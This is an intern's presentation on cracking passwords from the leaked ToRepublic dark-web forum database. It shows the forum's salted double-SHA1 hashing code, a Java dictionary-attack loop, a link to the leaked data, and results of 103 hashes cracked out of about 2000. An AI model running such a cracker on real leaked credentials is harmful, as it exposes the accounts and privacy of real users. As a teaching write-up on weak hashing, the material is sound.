Who I am? – Bartosz Zychal – How I knew how the passwords were hashed?
Who I am? – Bartosz Zychal – How I knew how the passwords were hashed?
0 0
Breaking-ToRepublic-s-user-s-password
On Github bartoszzychal / Breaking-ToRepublic-s-user-s-password
Who I am?
Bartosz Zychal
Intern in Capgemini since 1.02.2016
Member of Starter-Kit group
This presentation is shared on my github account http://bartoszzychal.github.io/Breaking-ToRepublic-s-user-s-password/
What is ToRepublic?
ToRepublic is a forum in deep web (TOR).
Forum's database and source code were leaked
...and are here: https://github.com/ToRepublic/ToRepublic
How I knew how the passwords were hashed?
Hashes have a length of 40 characters (hex encoded), so I guessed it's SHA1
Source code from file: login.php
$form_password_hash = forum_hash($form_password, $salt);
function: forum_hash()
Source code from file: functions.php
function forum_hash($str, $salt){
$return = ($hook = get_hook('fn_forum_hash_start')) ? eval($hook) : null;
if ($return != null)
return $return;
return sha1($salt.sha1($str));
}
So passwords were hashed by schema:
SHA1(SALT+SHA1(password))
What is salt?
In cryptography, a salt is random data that is used as an additional input to a one-way function that "hashes" a password or passphrase.
How I break the passwords?
I used dictionary method
Main loop
while (dictionary.ready() && existsNotBreakHash) {
String word = dictionary.readWord();
String sha1 = DigestUtils.sha1Hex(word);
users.parallelStream().forEach((user)->{
String encodeSaltSha1 = DigestUtils.sha1Hex(user.getSalt().concat(sha1));
if (user.getPassword().equals(encodeSaltSha1)) {
database.updateUserData(user, word);
}
});
}
Apache Commons Codec is used to generate the digests.
Results
Dictionary: 4GB (320*106 words)
Hashes to crack: ~2000
Hashes cracked: 103
Digests generated: 40*109
Time: 40h
CPU: Intel® Core™ i7-4810MQ 2.8 GHz
CPU usage: 100%